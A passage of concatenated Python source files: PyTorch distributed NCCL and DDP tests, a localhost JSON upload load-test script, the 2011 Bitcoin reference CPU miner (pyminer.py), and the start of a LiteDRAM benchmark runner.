for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(
self.AcceptsParam(p, dev + 1), self.AcceptsParam(p, dev + 1)
).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(
m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group,
)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(
p, 2.0 * (world * (world + 1.0) / 2.0) / world, device=dev
)
for name, p in m.named_parameters():
self.assertEqual(
p.grad,
analytic,
"mismatch at "
+ name
+ ".grad for "
+ "set_to_none = {}, use_bucket_view = {}".format(
try_set_to_none, use_bucket_view
),
)
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/main/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
def _train_model(self, model, input_var, target, loss, run_checkpoint=False):
model.train()
if run_checkpoint:
output = checkpoint(model, input_var)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
def _test_ddp_checkpointing(
self,
input_model,
process_group,
use_bucket_view,
find_unused_parameters=False,
static_graph=False,
run_checkpoint=False,
):
# to reprodce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
model = copy.deepcopy(input_model).cuda()
ddp_model = copy.deepcopy(input_model).cuda()
ddp_model = nn.parallel.DistributedDataParallel(
ddp_model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
)
if static_graph:
ddp_model._set_static_graph()
self.assertEqual(
ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
)
input, ddp_input, target, ddp_target = self._prepare_dummy_data()
loss = nn.MSELoss()
for i in range(5):
model.zero_grad(set_to_none=False)
ddp_model.zero_grad(set_to_none=False)
self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint)
self._train_model(
ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertTrue(i.grad is not None)
self.assertTrue(j.grad is not None)
self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# DDP works as expect when layer is checkpointed only once
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view, static_graph in product((False, True), (False, True)):
self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
)
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=False,
)
# test passes when static_graph is true
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=True,
)
# DDP will fail when the same layer is checkponted twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
)
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view, static_graph in product((False, True), (False, True)):
torch.manual_seed(31415)
l1 = nn.Linear(20, 20)
l2 = nn.Linear(20, 20)
l1.weight = l2.weight
model = nn.Sequential(l1, l2)
self._test_ddp_checkpointing(
model,
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
run_checkpoint=True,
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
@sandcastle_skip("Test does not pass when run locally")
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d_common runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get(
"NCCL_ASYNC_ERROR_HANDLING", None
)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block Python thread as allreduce enqueues
# the cuda operation, and then wait only blocks the current cuda
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=10),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait(timeout=timedelta(seconds=self.op_timeout_sec))
# Run some GPU operations to make sure cuda has not gotten stuck.
# It was observed cuda could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (ex: files for FileStore before going down)
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
@sandcastle_skip(
"Frequently times out see https://github.com/pytorch/pytorch/issues/58920"
)
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=10),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait(timeout=timedelta(seconds=self.op_timeout_sec))
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=10)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait(timeout=timedelta(seconds=5))
if self.rank == 0:
# This should timeout in about 1 second.
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait(timeout=timedelta(seconds=1))
else:
# Sleep to ensure timeout.
time.sleep(10)
self._wait_for_comm_abort(process_group)
class CommTest(test_c10d_common.AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are idential to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_default_pg_nccl(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_default_pg(backend="nccl")
@skip_if_lt_x_gpu(2)
@requires_nccl()
def test_sequence_num_incremented_nccl_default(self):
self._test_sequence_num_incremented_default_group("nccl")
@skip_if_lt_x_gpu(4)
@requires_nccl()
def test_sequence_num_incremented_nccl_subgroup(self):
if self.world_size < 4:
return sandcastle_skip("Test requires world_size of at least 4")
self._test_sequence_num_incremented_subgroup("nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_nccl_new_group(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_new_group(backend="nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts,
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# test if the process group constructed with high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Health check failure"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=10),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=10),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Health check failure"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=10),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Health check failure"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
URLTest.py | #coding=utf-8
import random
import threading
from time import ctime,sleep
import json
import urllib2
import time
def random_mac():
macList = []
for i in range(1, 7):
randStr = "".join(random.sample("0123456789abcdef",2))
macList.append(randStr)
randMac = ":".join(macList)
return randMac
def random_rssi():
return str(random.randrange(-100, 0))
def random_range():
return str(round(random.uniform(0, 100), 1))
def random_id():
return str(random.randrange(1, 1000))
probeList = []
# def randomProbe(times):
#
# for i in range(1000):
# probe = {"id": random_id(), "mmac": random_mac(), "rate": 3, "wssid": "test", "wmac": random_mac(), "time": }
# probes = json.dumps(probe)
# probeList.append(probes)
def random_json():
headers = {'Content-Type': 'application/json'}
probe = {"id": ''+random_id(), "mmac": random_mac(), "rate": "3", "wssid": "test", "wmac": random_mac(), "time": time.strftime('%a %b %e %H:%M:%S %Y', time.localtime(time.time()))}
mac_data ={"mac": random_mac(), "rssi": random_rssi(), "range": random_range()}
mac_DataMul = []
#data_json = json.dumps(mac_data)
for i in range(random.randrange(1, 5)):
mac_DataMul.append({"mac": random_mac(), "rssi": random_rssi(), "range": random_range()})
probe['data'] = mac_DataMul
probe = json.dumps(probe)
print probe
request = urllib2.Request(url='http://localhost:8080/upload.action', headers=headers, data=probe)
response = urllib2.urlopen(request)
print "response:" + response
if __name__ == '__main__':
threads = []
probeList = []
index=0
# for i in range(10):
# probe = {"id": i, "mmac": random_mac(), "rate": 3, "wssid": "test", "wmac": random_mac()}
# probes = json.dumps(probe)
# probeList.append(probes)
# for i in range(10):
# t = threading.Thread(target=random_json)
# threads.append(t)
# for i in range(10):
# threads[i].setDaemon(True)
# threads[i].start()
for i in range(1000):
random_json()
sleep(1)
print "all over %s" %ctime()
# print random_mac()
# print random_rssi()
# print random_range()
# print random_json() |
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 10320
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
run_benchmarks.py | #!/usr/bin/env python3
# This file is Copyright (c) 2020 Antmicro <www.antmicro.com>
# License: BSD
# Limitations/TODO
# - add configurable sdram_clk_freq - using hardcoded value now
# - sdram_controller_data_width - try to expose the value from litex_sim to avoid duplicated code
import os
import re
import sys
import json
import argparse
import datetime
import subprocess
from collections import defaultdict, namedtuple
import yaml
try:
import numpy as np
import pandas as pd
import matplotlib
from matplotlib.ticker import FuncFormatter, PercentFormatter, ScalarFormatter
_summary = True
except ImportError as e:
_summary = False
print("[WARNING] Results summary not available:", e, file=sys.stderr)
from litex.tools.litex_sim import get_sdram_phy_settings, sdram_module_nphases
from litedram import modules as litedram_modules
from litedram.common import Settings as _Settings
from test import benchmark
# Benchmark configuration --------------------------------------------------------------------------
class Settings(_Settings):
def as_dict(self):
d = dict()
for attr, value in vars(self).items():
if attr == "self" or attr.startswith("_"):
continue
if isinstance(value, Settings):
value = value.as_dict()
d[attr] = value
return d
class GeneratedAccess(Settings):
def __init__(self, bist_length, bist_random):
self.set_attributes(locals())
@property
def length(self):
return self.bist_length
def as_args(self):
args = ["--bist-length=%d" % self.bist_length]
if self.bist_random:
args.append("--bist-random")
return args
class CustomAccess(Settings):
def __init__(self, pattern_file):
self.set_attributes(locals())
@property
def pattern(self):
# We have to load the file to know pattern length, cache it when requested
if not hasattr(self, "_pattern"):
path = self.pattern_file
if not os.path.isabs(path):
benchmark_dir = os.path.dirname(benchmark.__file__)
path = os.path.join(benchmark_dir, path)
self._pattern = benchmark.load_access_pattern(path)
return self._pattern
@property
def length(self):
return len(self.pattern)
def as_args(self):
return ["--access-pattern=%s" % self.pattern_file]
class BenchmarkConfiguration(Settings):
def __init__(self, name, sdram_module, sdram_data_width, bist_alternating,
num_generators, num_checkers, access_pattern):
self.set_attributes(locals())
def as_args(self):
args = [
"--sdram-module=%s" % self.sdram_module,
"--sdram-data-width=%d" % self.sdram_data_width,
"--num-generators=%d" % self.num_generators,
"--num-checkers=%d" % self.num_checkers,
]
if self.bist_alternating:
args.append("--bist-alternating")
args += self.access_pattern.as_args()
return args
def __eq__(self, other):
if not isinstance(other, BenchmarkConfiguration):
return NotImplemented
return self.as_dict() == other.as_dict()
@property
def length(self):
return self.access_pattern.length
@classmethod
def from_dict(cls, d):
access_cls = CustomAccess if "pattern_file" in d["access_pattern"] else GeneratedAccess
d["access_pattern"] = access_cls(**d["access_pattern"])
return cls(**d)
@classmethod
def load_yaml(cls, yaml_file):
with open(yaml_file) as f:
description = yaml.safe_load(f)
configs = []
for name, desc in description.items():
desc["name"] = name
configs.append(cls.from_dict(desc))
return configs
def __repr__(self):
return "BenchmarkConfiguration(%s)" % self.as_dict()
@property
def sdram_clk_freq(self):
return 100e6 # FIXME: Value of 100MHz is hardcoded in litex_sim
@property
def sdram_memtype(self):
# Use values from module class (no need to instantiate it)
sdram_module_cls = getattr(litedram_modules, self.sdram_module)
return sdram_module_cls.memtype
@property
def sdram_controller_data_width(self):
nphases = sdram_module_nphases[self.sdram_memtype]
dfi_databits = self.sdram_data_width * (1 if self.sdram_memtype == "SDR" else 2)
return dfi_databits * nphases
# Benchmark results --------------------------------------------------------------------------------
# Constructs python regex named group
def ng(name, regex):
return r"(?P<{}>{})".format(name, regex)
def _compiled_pattern(stage, var):
pattern_fmt = r"{stage}\s+{var}:\s+{value}"
pattern = pattern_fmt.format(
stage = stage,
var = var,
value = ng("value", "[0-9]+"),
)
return re.compile(pattern)
result = re.search(pattern, benchmark_output)
class BenchmarkResult:
# Pre-compiled patterns for all benchmarks
patterns = {
"generator_ticks": _compiled_pattern("BIST-GENERATOR", "ticks"),
"checker_errors": _compiled_pattern("BIST-CHECKER", "errors"),
"checker_ticks": _compiled_pattern("BIST-CHECKER", "ticks"),
}
